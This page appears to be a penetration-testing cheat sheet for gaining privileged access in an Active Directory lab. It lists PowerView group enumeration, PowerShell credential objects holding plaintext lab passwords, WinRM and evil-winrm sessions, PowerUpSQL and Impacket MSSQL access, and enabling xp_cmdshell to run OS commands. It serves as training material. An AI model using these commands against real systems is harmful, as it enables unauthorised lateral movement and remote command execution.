LinkedInGithub
Edit

Privileged Access

Privileged Access

1. Enumerate Remote Desktop Users Group

Command:

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

  • Description: PowerView-based tool used to enumerate the Remote Desktop Users group on a Windows target (ACADEMY-EA-MS01).

2. Enumerate Remote Management Users Group

Command:

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

  • Description: PowerView-based tool used to enumerate the Remote Management Users group on a Windows target (ACADEMY-EA-MS01).

3. Create a Secure Password Variable

Command:

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force

  • Description: Creates a variable ($password) set to the password (Klmcargo2) of a user.

4. Create a Credential Object

Command:

$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)

  • Description: Creates a variable ($cred) set to the username (forend) and password ($password) of a target domain account.

5. Establish a PowerShell Session

Command:

Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred

  • Description: Uses Enter-PSSession to establish a PowerShell session with a target over the network (ACADEMY-EA-DB01). Authenticates using credentials created earlier ($cred & $password).

6. Establish a PowerShell Session Using Evil-WinRM

Command:

evil-winrm -i 10.129.201.234 -u forend

  • Description: Used to establish a PowerShell session with a Windows target from a Linux-based host using WinRM.

7. Import PowerUpSQL

Command:

Import-Module .\PowerUpSQL.ps1

  • Description: Used to import the PowerUpSQL tool.

8. Enumerate SQL Server Instances

Command:

Get-SQLInstanceDomain

  • Description: PowerUpSQL tool used to enumerate SQL server instances.

9. Query SQL Server Version

Command:

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

  • Description: PowerUpSQL tool used to connect to an SQL server and query its version.

10. Display mssqlclient.py Options

Command:

mssqlclient.py

  • Description: Impacket tool used to display the functionality and options provided by mssqlclient.py from a Linux-based host.

11. Connect to MSSQL Server

Command:

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

  • Description: Impacket tool used to connect to an MSSQL server from a Linux-based host.

12. Display SQL Client Options

Command:

SQL> help

  • Description: Used to display mssqlclient.py options once connected to an MSSQL server.

13. Enable xp_cmdshell

Command:

SQL> enable_xp_cmdshell

  • Description: Used to enable the xp_cmdshell stored procedure, allowing execution of OS commands via the database.

14. Enumerate System Rights

  • Command:

xp_cmdshell whoami /priv

  • Description: Used to enumerate rights on a system using xp_cmdshell.

PreviousPrintNightmareNextGroup Policy Enumeration & Attacks

Last updated